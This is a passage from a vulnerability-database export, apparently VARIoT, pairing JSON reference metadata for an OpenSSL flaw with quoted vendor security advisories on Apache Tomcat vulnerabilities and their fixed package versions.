        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0289"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0288"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0209"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0195"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3571"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-5298"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0287"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0076"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0286"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3513"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0224"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8275"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0198"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3572"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0289"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3470"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0204"
      },
      {
        "trust": 0.1,
        "url": "http://openssl.org/news/secadv_20150319.txt"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0198"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3570"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5298"
      },
      {
        "trust": 0.1,
        "url": "http://openssl.org/news/secadv_20150108.txt"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0204"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3571"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0221"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0076"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0288"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0206"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0205"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0293"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0224"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3570"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0221"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8275"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3572"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3470"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3569"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0293"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0206"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.20"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.7"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.22"
      },
      {
        "trust": 0.1,
        "url": "https://www.hp.com/go/swa"
      },
      {
        "trust": 0.1,
        "url": "http://h18013.www1.hp.com/products/servers/management/hpsim/download.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0248"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5910"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3185"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/kb/ht201222"
      },
      {
        "trust": 0.1,
        "url": "https://www.apple.com/support/security/pgp/"
      },
      {
        "trust": 0.1,
        "url": "https://developer.apple.com/xcode/downloads/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6394"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0251"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5909"
      },
      {
        "trust": 0.1,
        "url": "http://gpgtools.org"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3513"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/1232123"
      },
      {
        "trust": 0.1,
        "url": "https://www.openssl.org/~bodo/ssl-poodle.pdf"
      },
      {
        "trust": 0.1,
        "url": "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00"
      },
      {
        "trust": 0.1,
        "url": "https://www.openssl.org/about/secpolicy.html"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2014-3567"
      },
      {
        "db": "BID",
        "id": "70586"
      },
      {
        "db": "PACKETSTORM",
        "id": "131306"
      },
      {
        "db": "PACKETSTORM",
        "id": "130815"
      },
      {
        "db": "PACKETSTORM",
        "id": "128838"
      },
      {
        "db": "PACKETSTORM",
        "id": "131273"
      },
      {
        "db": "PACKETSTORM",
        "id": "131014"
      },
      {
        "db": "PACKETSTORM",
        "id": "132085"
      },
      {
        "db": "PACKETSTORM",
        "id": "131044"
      },
      {
        "db": "PACKETSTORM",
        "id": "128708"
      },
      {
        "db": "PACKETSTORM",
        "id": "128921"
      },
      {
        "db": "PACKETSTORM",
        "id": "132081"
      },
      {
        "db": "PACKETSTORM",
        "id": "133617"
      },
      {
        "db": "PACKETSTORM",
        "id": "132080"
      },
      {
        "db": "PACKETSTORM",
        "id": "128728"
      },
      {
        "db": "PACKETSTORM",
        "id": "128793"
      },
      {
        "db": "PACKETSTORM",
        "id": "169664"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-636"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3567"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2014-3567"
      },
      {
        "db": "BID",
        "id": "70586"
      },
      {
        "db": "PACKETSTORM",
        "id": "131306"
      },
      {
        "db": "PACKETSTORM",
        "id": "130815"
      },
      {
        "db": "PACKETSTORM",
        "id": "128838"
      },
      {
        "db": "PACKETSTORM",
        "id": "131273"
      },
      {
        "db": "PACKETSTORM",
        "id": "131014"
      },
      {
        "db": "PACKETSTORM",
        "id": "132085"
      },
      {
        "db": "PACKETSTORM",
        "id": "131044"
      },
      {
        "db": "PACKETSTORM",
        "id": "128708"
      },
      {
        "db": "PACKETSTORM",
        "id": "128921"
      },
      {
        "db": "PACKETSTORM",
        "id": "132081"
      },
      {
        "db": "PACKETSTORM",
        "id": "133617"
      },
      {
        "db": "PACKETSTORM",
        "id": "132080"
      },
      {
        "db": "PACKETSTORM",
        "id": "128728"
      },
      {
        "db": "PACKETSTORM",
        "id": "128793"
      },
      {
        "db": "PACKETSTORM",
        "id": "169664"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-636"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3567"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-10-19T00:00:00",
        "db": "VULMON",
        "id": "CVE-2014-3567"
      },
      {
        "date": "2014-10-15T00:00:00",
        "db": "BID",
        "id": "70586"
      },
      {
        "date": "2015-04-06T19:11:05",
        "db": "PACKETSTORM",
        "id": "131306"
      },
      {
        "date": "2015-03-13T17:11:00",
        "db": "PACKETSTORM",
        "id": "130815"
      },
      {
        "date": "2014-10-24T20:07:16",
        "db": "PACKETSTORM",
        "id": "128838"
      },
      {
        "date": "2015-04-03T15:45:16",
        "db": "PACKETSTORM",
        "id": "131273"
      },
      {
        "date": "2015-03-25T00:42:25",
        "db": "PACKETSTORM",
        "id": "131014"
      },
      {
        "date": "2015-05-29T23:37:43",
        "db": "PACKETSTORM",
        "id": "132085"
      },
      {
        "date": "2015-03-27T20:42:44",
        "db": "PACKETSTORM",
        "id": "131044"
      },
      {
        "date": "2014-10-17T00:03:35",
        "db": "PACKETSTORM",
        "id": "128708"
      },
      {
        "date": "2014-10-31T23:08:29",
        "db": "PACKETSTORM",
        "id": "128921"
      },
      {
        "date": "2015-05-29T23:37:11",
        "db": "PACKETSTORM",
        "id": "132081"
      },
      {
        "date": "2015-09-19T15:31:48",
        "db": "PACKETSTORM",
        "id": "133617"
      },
      {
        "date": "2015-05-29T23:37:04",
        "db": "PACKETSTORM",
        "id": "132080"
      },
      {
        "date": "2014-10-17T14:50:20",
        "db": "PACKETSTORM",
        "id": "128728"
      },
      {
        "date": "2014-10-22T18:52:41",
        "db": "PACKETSTORM",
        "id": "128793"
      },
      {
        "date": "2014-10-15T12:12:12",
        "db": "PACKETSTORM",
        "id": "169664"
      },
      {
        "date": "2014-10-22T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201410-636"
      },
      {
        "date": "2014-10-19T01:55:13.933000",
        "db": "NVD",
        "id": "CVE-2014-3567"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2014-3567"
      },
      {
        "date": "2016-09-09T15:00:00",
        "db": "BID",
        "id": "70586"
      },
      {
        "date": "2022-02-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201410-636"
      },
      {
        "date": "2023-11-07T02:20:13.200000",
        "db": "NVD",
        "id": "CVE-2014-3567"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "128708"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-636"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "OpenSSL Memory leak denial of service vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-636"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-636"
      }
    ],
    "trust": 0.6
  }
}

VAR-201405-0541

Vulnerability from variot - Updated: 2024-07-23 21:10

Integer overflow in java/org/apache/tomcat/util/buf/Ascii.java in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4, when operated behind a reverse proxy, allows remote attackers to conduct HTTP request smuggling attacks via a crafted Content-Length HTTP header. Apache Tomcat is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information that may lead to further attacks. The following versions are vulnerable: Apache Tomcat 8.0.0-RC1 to 8.0.3 Apache Tomcat 7.0.0 to 7.0.52 Apache Tomcat 6.0.0 to 6.0.39. ============================================================================ Ubuntu Security Notice USN-2302-1 July 30, 2014

tomcat6, tomcat7 vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 14.04 LTS
Ubuntu 12.04 LTS
Ubuntu 10.04 LTS

Summary:

Several security issues were fixed in Tomcat.

Software Description: - tomcat7: Servlet and JSP engine - tomcat6: Servlet and JSP engine

Details:

David Jorm discovered that Tomcat incorrectly handled certain requests submitted using chunked transfer encoding. (CVE-2014-0075)

It was discovered that Tomcat did not properly restrict XSLT stylesheets. (CVE-2014-0096)

It was discovered that Tomcat incorrectly handled certain Content-Length headers. (CVE-2014-0099)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 LTS: libtomcat7-java 7.0.52-1ubuntu0.1

Ubuntu 12.04 LTS: libtomcat6-java 6.0.35-1ubuntu3.5

Ubuntu 10.04 LTS: libtomcat6-java 6.0.24-2ubuntu1.16

In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Mandriva Linux Security Advisory MDVSA-2015:052 http://www.mandriva.com/en/support/security/

Package : tomcat Date : March 3, 2015 Affected: Business Server 1.0

Problem Description:

Updated tomcat packages fix security vulnerabilities:

Apache Tomcat 7.x before 7.0.47, when an HTTP connector or AJP connector is used, does not properly handle certain inconsistent HTTP request headers, which allows remote attackers to trigger incorrect identification of a request's length and conduct request-smuggling attacks via (1) multiple Content-Length headers or (2) a Content-Length header and a Transfer-Encoding: chunked header (CVE-2013-4286).

Apache Tomcat 7.x before 7.0.50 processes chunked transfer coding without properly handling (1) a large total amount of chunked data or (2) whitespace characters in an HTTP header value within a trailer field, which allows remote attackers to cause a denial of service by streaming data (CVE-2013-4322).

java/org/apache/catalina/servlets/DefaultServlet.java in the default servlet in Apache Tomcat before 6.0.40 and 7.x before 7.0.53 does not properly restrict XSLT stylesheets, which allows remote attackers to bypass security-manager restrictions and read arbitrary files via a crafted web application that provides an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue (CVE-2014-0096).

Apache Tomcat before 6.0.40 and 7.x before 7.0.54 does not properly constrain the class loader that accesses the XML parser used with an XSLT stylesheet, which allows remote attackers to read arbitrary files via a crafted web application that provides an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, or read files associated with different web applications on a single Tomcat instance via a crafted web application (CVE-2014-0119).

In Apache Tomcat 7.x before 7.0.55, it was possible to craft a malformed chunk as part of a chunked request that caused Tomcat to read part of the request body as a new request (CVE-2014-0227).

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4286 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4322 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4590 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0075 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0096 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0099 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0119 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0227 http://advisories.mageia.org/MGASA-2014-0148.html http://advisories.mageia.org/MGASA-2014-0268.html http://advisories.mageia.org/MGASA-2015-0081.html

Updated Packages:

Mandriva Business Server 1/X86_64: dce2bd5077a8e201da2a52717f3ef3a4 mbs1/x86_64/tomcat-7.0.59-1.mbs1.noarch.rpm 7908cc5facecb5c65c976cdff41b1d7c mbs1/x86_64/tomcat-admin-webapps-7.0.59-1.mbs1.noarch.rpm 21d8b843398fa256f05b1ad8464b6787 mbs1/x86_64/tomcat-docs-webapp-7.0.59-1.mbs1.noarch.rpm 27218eccc1ba454ef1cafea51976475a mbs1/x86_64/tomcat-el-2.2-api-7.0.59-1.mbs1.noarch.rpm cc0f94bb899c3a82ecb1daa0cccd40b9 mbs1/x86_64/tomcat-javadoc-7.0.59-1.mbs1.noarch.rpm 60c451802ce55df14445d2a560f544f8 mbs1/x86_64/tomcat-jsp-2.2-api-7.0.59-1.mbs1.noarch.rpm d7598284719161790f2617b715dbe444 mbs1/x86_64/tomcat-jsvc-7.0.59-1.mbs1.noarch.rpm 90279c92333646b38010bcf54f488e4a mbs1/x86_64/tomcat-lib-7.0.59-1.mbs1.noarch.rpm e8b29b53c91bee0b3ffdd224c6b00038 mbs1/x86_64/tomcat-log4j-7.0.59-1.mbs1.noarch.rpm a648279678ad5c804e8f7f9145ec794c mbs1/x86_64/tomcat-servlet-3.0-api-7.0.59-1.mbs1.noarch.rpm f0cb2c5e57edc0c4f7cda66d393165fb mbs1/x86_64/tomcat-webapps-7.0.59-1.mbs1.noarch.rpm cdaa6216b605cc23635cdeb4f77d32f9 mbs1/SRPMS/tomcat-7.0.59-1.mbs1.src.rpm

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/en/support/security/advisories/

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com

Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFU9XSSmqjQ0CJFipgRAorsAKDX0BTWLEiMn3+FR9/Xn58Pw7GIMwCfRAbS NzlDtJatpPDeZdZ4nlO1fgg= =NWBY -----END PGP SIGNATURE----- .

Mitigation: Users of affected versions should apply one of the following mitigations - Upgrade to Apache Tomcat 8.0.5 or later (8.0.4 contains the fix but was not released) - Upgrade to Apache Tomcat 7.0.53 or later - Upgrade to Apache Tomcat 6.0.41 or later (6.0.40 contains the fix but was not released)

Credit: A test case that demonstrated the parsing bug was sent to the Tomcat security team but no context was provided. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Moderate: Red Hat JBoss Web Server 2.0.1 tomcat6 security update Advisory ID: RHSA-2014:0833-01 Product: Red Hat JBoss Web Server Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0833.html Issue date: 2014-07-03 CVE Names: CVE-2014-0075 CVE-2014-0096 CVE-2014-0099 =====================================================================

Summary:

An update for the Apache Tomcat 6 component for Red Hat JBoss Web Server 2.0.1 that fixes three security issues is now available from the Red Hat Customer Portal.

The Red Hat Security Response Team has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

Description:

Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications.

It was discovered that Apache Tomcat did not limit the length of chunk sizes when using chunked transfer encoding. A remote attacker could use this flaw to perform a denial of service attack against Tomcat by streaming an unlimited quantity of data, leading to excessive consumption of server resources. (CVE-2014-0075)

It was found that Apache Tomcat did not check for overflowing values when parsing request content length headers. (CVE-2014-0099)

It was found that the org.apache.catalina.servlets.DefaultServlet implementation in Apache Tomcat allowed the definition of XML External Entities (XXEs) in provided XSLTs. A malicious application could use this to circumvent intended security restrictions to disclose sensitive information. (CVE-2014-0096)

The CVE-2014-0075 issue was discovered by David Jorm of Red Hat Product Security.

All users of Red Hat JBoss Web Server 2.0.1 as provided from the Red Hat Customer Portal are advised to apply this update. The Red Hat JBoss Web Server process must be restarted for the update to take effect.

Solution:

The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).

Bugs fixed (https://bugzilla.redhat.com/):

1072776 - CVE-2014-0075 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding input filter 1088342 - CVE-2014-0096 Tomcat/JBossWeb: XXE vulnerability via user supplied XSLTs 1102030 - CVE-2014-0099 Tomcat/JBossWeb: Request smuggling via malicious content length header

References:

https://www.redhat.com/security/data/cve/CVE-2014-0075.html https://www.redhat.com/security/data/cve/CVE-2014-0096.html https://www.redhat.com/security/data/cve/CVE-2014-0099.html https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=webserver&downloadType=securityPatches&version=2.0.1

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iD8DBQFTtaPdXlSAg2UNWIIRAhrCAKC1npkA9rY3/60CBN59GnEynLsgggCfT0zg TUqsunatvAtbihs+9jH0Lhg= =AdmM -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04483248

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04483248 Version: 1

HPSBUX03150 SSRT101681 rev.1 - HP-UX Apache Server Suite running Apache Tomcat or PHP, Remote Denial of Service (DoS) and Other Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2014-10-20 Last Updated: 2014-10-20

Potential Security Impact: Remote Denial of Service (DoS), man-in-the-middle (MitM) attack, HTTP request smuggling, modification of data; local modification of data

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with the HP-UX Apache Web Server Suite, Tomcat Servlet Engine, and PHP. These could be exploited remotely to create a Denial of Service (DoS) and other vulnerabilities.

References:

CVE-2013-4248 - PHP: man-in-the-middle (MitM) attack

CVE-2013-4286 - Tomcat: remote HTTP request smuggling

CVE-2013-6438 - Tomcat: remote Denial of Service (DoS)

CVE-2014-0075 - Tomcat: remote Denial of Service (DoS)

CVE-2014-0098 - Tomcat: remote Denial of Service (DoS)

CVE-2014-0099 - Tomcat: remote HTTP request smuggling

CVE-2014-3981 - PHP: local modification of data

SSRT101681

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP-UX B.11.23 running HP-UX Apache Web Server Suite v3.29 or earlier

HP-UX B.11.23 running Tomcat v5.5.36.01 or earlier

HP-UX B.11.23 running PHP v5.2.17.03 or earlier

BACKGROUND

CVSS 2.0 Base Metrics

Reference Base Vector Base Score CVE-2013-4248 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2013-4286 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8 CVE-2013-6438 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-0075 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-0098 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-0099 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2014-3981 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided the following software updates to resolve the vulnerabilities.

The updates are available for download from http://software.hp.com

NOTE: HP-UX Web Server Suite v3.30 HPUXWSATW330 contains Apache v2.2.15.21, Tomcat Servlet Engine 5.5.36.02, and PHP 5.2.17.04

HP-UX 11i Release Apache Depot name

B.11.23 (11i v2 32-bit) HP_UX_11.23_HPUXWS22ATW-B330-11-23-32.depot

B.11.23 (11i v2 64-bit) HP_UX_11.23_HPUXWS22ATW-B330-11-23-64.depot

MANUAL ACTIONS: Yes - Update Install HP-UX Web Server Suite v3.30 or subsequent

PRODUCT SPECIFIC INFORMATION

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.23

hpuxws22APCH32.APACHE hpuxws22APCH32.APACHE2 hpuxws22APCH32.AUTH_LDAP hpuxws22APCH32.AUTH_LDAP2 hpuxws22APCH32.MOD_JK hpuxws22APCH32.MOD_JK2 hpuxws22APCH32.MOD_PERL hpuxws22APCH32.MOD_PERL2 hpuxws22APCH32.PHP hpuxws22APCH32.PHP2 hpuxws22APCH32.WEBPROXY hpuxws22APCH32.WEBPROXY2 hpuxws22APACHE.APACHE hpuxws22APACHE.APACHE2 hpuxws22APACHE.AUTH_LDAP hpuxws22APACHE.AUTH_LDAP2 hpuxws22APACHE.MOD_JK hpuxws22APACHE.MOD_JK2 hpuxws22APACHE.MOD_PERL hpuxws22APACHE.MOD_PERL2 hpuxws22APACHE.PHP hpuxws22APACHE.PHP2 hpuxws22APACHE.WEBPROXY hpuxws22APACHE.WEBPROXY2 hpuxws22TOMCAT.TOMCAT action: install revision B.2.2.15.21 or subsequent

END AFFECTED VERSIONS

HISTORY Version:1 (rev.1) - 20 October 2014 Initial release

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

For the oldstable distribution (wheezy), these problems have been fixed in version 6.0.45+dfsg-1~deb7u1. Description:

Red Hat JBoss BPM Suite is a business rules and processes management system for the management, storage, creation, modification, and deployment of JBoss rules and BPMN2-compliant business processes.

This roll up patch serves as a cumulative upgrade for Red Hat JBoss BPM Suite 6.0.3, and includes bug fixes and enhancements. It includes various bug fixes, which are listed in the README file included with the patch files.

The following security issues are also fixed with this release, descriptions of which can be found on the respective CVE pages linked in the References section.

CVE-2012-6153 Apache HttpComponents client: SSL hostname verification bypass, incomplete CVE-2012-5783 fix

CVE-2014-3577 Apache HttpComponents client: SSL hostname verification bypass, incomplete CVE-2012-6153 fix

CVE-2013-4002 xerces-j2: Xerces-J2 OpenJDK: XML parsing Denial of Service (JAXP, 8017298)

CVE-2013-5855 Mojarra JSF: XSS due to insufficient escaping of user-supplied content in outputText tags and EL expressions

CVE-2014-0005 security: PicketBox/JBossSX: Unauthorized access to and modification of application server configuration and state by application

CVE-2014-0075 jbossweb: tomcat: Limited DoS in chunked transfer encoding input filter

CVE-2014-0096 jbossweb: Apache Tomcat: XXE vulnerability via user supplied XSLTs

CVE-2014-0099 jbossweb: Apache Tomcat: Request smuggling via malicious content length header

CVE-2014-0119 jbossweb: Apache Tomcat 6: XML parser hijack by malicious web application

CVE-2014-0193 netty: DoS via memory exhaustion during data aggregation

CVE-2014-0227 Tomcat/JBossWeb: Limited DoS in chunked transfer encoding input filter

CVE-2014-3472 jboss-as-controller: JBoss AS Security: Invalid EJB caller role check implementation

CVE-2014-3490 RESTEasy: XXE via parameter entities

CVE-2014-3530 PicketLink: XXE via insecure DocumentBuilderFactory usage

CVE-2014-3558 hibernate-validator: Hibernate Validator: JSM bypass via ReflectionHelper

CVE-2014-3578 spring: Spring Framework: Directory traversal

CVE-2014-3625 spring: Spring Framework: directory traversal flaw

CVE-2014-3682 jbpm-designer: XXE in BPMN2 import

CVE-2014-8114 UberFire: Information disclosure and RCE via insecure file upload/download servlets

CVE-2014-8115 KIE Workbench: Insufficient authorization constraints

